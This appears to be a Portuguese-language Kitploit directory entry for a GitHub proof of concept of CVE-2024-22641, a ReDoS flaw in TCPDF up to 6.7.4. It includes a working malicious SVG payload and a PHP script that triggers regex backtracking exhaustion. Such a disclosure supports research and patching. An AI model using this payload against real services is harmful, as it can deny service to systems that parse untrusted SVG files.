Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2024-22641 — Prova de conceito para CVE-2024-22641: vulnerabilidade ReDoS no TCPDF <=6.7.4 desencadeada por arquivos SVG maliciosos, demonstrando exaustão do limite de retrocesso de regex. | Kitploit
Ferramentas/GitHubGitHub/zunak/cve-2024-22641
Análise de VulnerabilidadesExploraçãoSegurança WebFuzzingPapers e PesquisaAprendizado e Educação
GitHubzunak/cve-2024-22641

CVE-2024-22641

Prova de conceito para CVE-2024-22641: vulnerabilidade ReDoS no TCPDF <=6.7.4 desencadeada por arquivos SVG maliciosos, demonstrando exaustão do limite de retrocesso de regex.

Ver Repositório
1há 2 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2024-22641

Tipo de Vulnerabilidade

Negação de Serviço por Expressão Regular (ReDoS)

Produto e Versão Afetados

TCPDF <= 6.7.4

Vetor de Ataque

TCPDF analisa arquivo SVG contendo payload malicioso.

Descrição

A versão <= 6.7.4 do TCPDF é vulnerável a ReDoS (Negação de Serviço por Expressão Regular) ao analisar um arquivo SVG não confiável.

PoC

root@kitploit:~
<!--poc.svg-->
<svg
  version="1.1"
  xmlns="http://www.w3.org/2000/svg"
  xmlns:xlink="http://www.w3.org/1999/xlink">
  <circle clip="rect(0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000!)"/>
</svg>
root@kitploit:~
<?php
require_once('../tcpdf.php');

// create new PDF document
$pdf = new TCPDF(PDF_PAGE_ORIENTATION, PDF_UNIT, PDF_PAGE_FORMAT, true, 'UTF-8', false);


// add a page
$pdf->AddPage();

$pdf->ImageSVG($file='poc.svg');
?>

Nota: Verificando com preg_last_error() após a linha vulnerável de código, a regEx sairá com PREG_BACKTRACK_LIMIT_ERROR.

Baixar ferramenta